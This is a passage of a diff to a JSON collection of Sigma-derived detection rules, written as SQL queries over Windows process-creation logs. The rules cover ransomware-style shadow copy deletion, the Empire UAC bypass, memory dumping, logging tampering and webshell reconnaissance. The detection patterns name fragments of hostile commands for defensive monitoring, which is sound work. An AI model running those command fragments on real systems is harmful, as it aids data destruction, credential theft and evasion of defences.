Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' 
ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as 
system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR 
CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName 
LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine 
LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE 
'\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. 
before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], "falsepositives": [ "Unknown" 
], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE 
'%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory 